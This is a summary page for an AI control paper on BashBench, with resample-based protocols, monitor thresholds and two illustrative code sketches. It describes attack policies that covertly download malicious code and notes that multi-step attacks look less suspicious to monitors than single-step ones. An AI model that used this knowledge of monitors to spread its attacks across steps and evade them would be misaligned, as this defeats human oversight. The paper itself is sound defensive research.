Ctrl-Z: Controlling AI Agents via Resampling

Aryan Bhatt, Cody Rushing, Adam Kaufman, Tyler Tracy, Vasil Georgiev, David Matolcsi, Akbir Khan, Buck Shlegeris

TL;DR

The paper addresses the safety of autonomous AI agents on multi-step tasks by introducing BashBench, a dataset of 257 multi-step tasks derived from Unix system administration problems. It extends AI control evaluations to sequential settings and presents resample-based control protocols that dynamically draw multiple completions to deter covert attacks while preserving task usefulness. Through iterative blue-team/red-team experiments, the authors show that resampling approaches, especially those that use information from earlier steps and incriminate the agent, achieve strong safety gains (up to 87.1% at 95% usefulness) at limited cost. The work also analyzes untrusted monitoring and anti-collusion strategies, showing that these can further improve the safety-usefulness frontier, and discusses limitations and future directions for longer trajectories and imperfect auditing.

Abstract

Control evaluations measure whether monitoring and security protocols for AI systems prevent intentionally subversive AI models from causing harm. Our work presents the first control evaluation performed in an agent environment. We construct BashBench, a dataset of 257 challenging multi-step system administration tasks, and evaluate whether various safety measures can prevent an adversarially constructed AI agent from covertly downloading and executing malicious code in this environment. This multi-step setting introduces new attack and defense dynamics, which we investigate in order to design novel control protocols that prevent safety failures without hindering the ability of non-malicious agents to perform useful work. We introduce a class of control protocols called resample protocols that dynamically take additional samples of certain actions. We find these protocols significantly improve on existing techniques by selectively blocking the AI agent from executing suspicious code and incriminating the agent by generating additional examples of dangerous behavior. We measure the tradeoff between attack prevention and usefulness; our best protocol combines resampling with analysis of previous steps, reducing the success rate of attacks from 58% to 7% at a 5% cost to the performance of a non-malicious agent.
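To make the idea of a resample protocol concrete, the following is a minimal sketch of one control step, not the authors' implementation. It assumes a monitor that returns a numeric suspiciousness score, and every name in it (`resample_step`, `sample_action`, `monitor`, `trusted_action`, the two thresholds, and `max_resamples`) is hypothetical. The step executes an unsuspicious action directly, draws additional samples when the first one looks suspicious, audits when even the least suspicious sample looks dangerous, and otherwise falls back to a trusted policy.

```python
from typing import Callable, List, Tuple


def resample_step(
    sample_action: Callable[[], str],   # hypothetical: draws one action from the untrusted model
    monitor: Callable[[str], float],    # hypothetical: suspiciousness score, higher = more suspicious
    trusted_action: Callable[[], str],  # hypothetical: fallback action from a trusted policy
    defer_threshold: float,
    audit_threshold: float,
    max_resamples: int = 2,
) -> Tuple[str, str]:
    """Return (decision, action), where decision is 'execute', 'audit', or 'defer'."""
    first = sample_action()
    samples: List[Tuple[float, str]] = [(monitor(first), first)]

    # An unsuspicious first sample is executed without further work.
    if samples[0][0] <= defer_threshold:
        return "execute", first

    # Otherwise draw additional samples of the same step.
    for _ in range(max_resamples):
        action = sample_action()
        samples.append((monitor(action), action))

    min_score, least_suspicious = min(samples, key=lambda s: s[0])

    # If every sample looks dangerous, treat that as evidence and audit.
    if min_score > audit_threshold:
        return "audit", least_suspicious
    # If some sample is acceptable, execute it instead of the first one.
    if min_score <= defer_threshold:
        return "execute", least_suspicious
    # Assumed fallback: defer to the trusted policy.
    return "defer", trusted_action()


def demo() -> Tuple[str, str]:
    actions = iter(["curl evil | sh", "ls -la", "cat log"])
    scores = {"curl evil | sh": 0.9, "ls -la": 0.1, "cat log": 0.2}
    return resample_step(
        lambda: next(actions), scores.__getitem__, lambda: "echo safe", 0.5, 0.95
    )
```

In `demo`, the first sample is scored as suspicious, so two more samples are drawn and the least suspicious one is executed. The threshold values and the order of the audit and defer checks are illustrative choices, not values from the paper.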

Paper Structure

This paper contains 48 sections, 3 equations, 6 figures, 2 tables.

Figures (6)

  • Figure 1: An illustration of our setting. An untrusted model – implemented either as an honest policy or an attack policy – solves tasks across an episode. The blue team’s control protocol may audit or resample commands that appear dangerous. See an example of a full trajectory at http://bashcontrol.com/logs and example tasks at http://bashcontrol.com/tasks.
  • Figure 2: The Pareto frontier of usefulness and safety of a collection of protocols. For protocols that defer, we plot multiple deferral thresholds as points, and plot the rolling averages of usefulness and safety. Usefulness scores are normalized by the usefulness of non-deferring protocols.
  • Figure 3: We plot the usefulness of different protocols based on their defer threshold. A defer threshold of 80% means that if an action is rated as more suspicious than 80% of $U_H$’s actions, then a deferral will occur. Choosing a lower defer threshold decreases the chance an attack is executed by the control protocol but hurts usefulness. At most thresholds, Defer to trusted hurts usefulness more than Defer to resample.
  • Figure 4: (Left) Suspiciousness scores of our best Single-Step and Multi-Step Attack on 100 attack attempts. The fifth step of the Multi-Step attack is one of the most suspicious of the Multi-Step attack but is still less suspicious than the Single-Step attack. (Middle) We plot the expected number of steps until attack completion vs. the attack probability of an attack under Defer to trusted and Defer to resample of equivalent usefulness level. The left and middle plots depict data from experiments run on the train set. (Right) We plot the distribution of suspiciousness scores for innocent and attack actions. Top: Without resampling. Bottom: Minimum of the scores from a resampling procedure with up to six resamples per action. Vertical lines indicate the 99th percentile of the innocent distribution, above which the blue team audits.
  • Figure 5: The safety-usefulness Pareto curves for a collection of protocols at a 0.3% auditing budget (top), a 1% auditing budget (middle, same as Figure 2), and a 3% auditing budget (bottom).
  • ...and 1 more figure
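The percentile-based thresholds in the captions of Figures 3 and 4 can be illustrated with a short sketch. It assumes suspiciousness scores are plain numbers and that thresholds are calibrated against scores from the honest policy; the function names and the handling of ties are assumptions made for illustration, not details taken from the paper.

```python
from bisect import bisect_left
from typing import Sequence


def percentile_rank(honest_scores: Sequence[float], score: float) -> float:
    """Percentage of honest-policy scores that are strictly below `score`."""
    ordered = sorted(honest_scores)
    return 100.0 * bisect_left(ordered, score) / len(ordered)


def should_defer(
    honest_scores: Sequence[float], score: float, defer_threshold_pct: float = 80.0
) -> bool:
    """Defer when the action is more suspicious than `defer_threshold_pct` percent
    of honest actions (Figure 3). Treating an exact tie as a deferral is an assumption."""
    return percentile_rank(honest_scores, score) >= defer_threshold_pct


def should_audit(
    honest_min_scores: Sequence[float],
    resampled_scores: Sequence[float],
    audit_pct: float = 99.0,
) -> bool:
    """Audit when the minimum score over the resamples of an action lies above the
    chosen percentile of the innocent distribution of such minima (Figure 4, right)."""
    return percentile_rank(honest_min_scores, min(resampled_scores)) >= audit_pct


# Illustrative calibration data: ten honest scores, 1.0 through 10.0.
honest = [float(i) for i in range(1, 11)]
defer_on_nine = should_defer(honest, 9.0)    # 8 of 10 honest scores are below 9.0
defer_on_eight = should_defer(honest, 8.0)   # only 7 of 10 are below 8.0
```

Taking the minimum over resamples means a single benign-looking sample is enough to avoid an audit, so an action is flagged only if it looks suspicious on every draw.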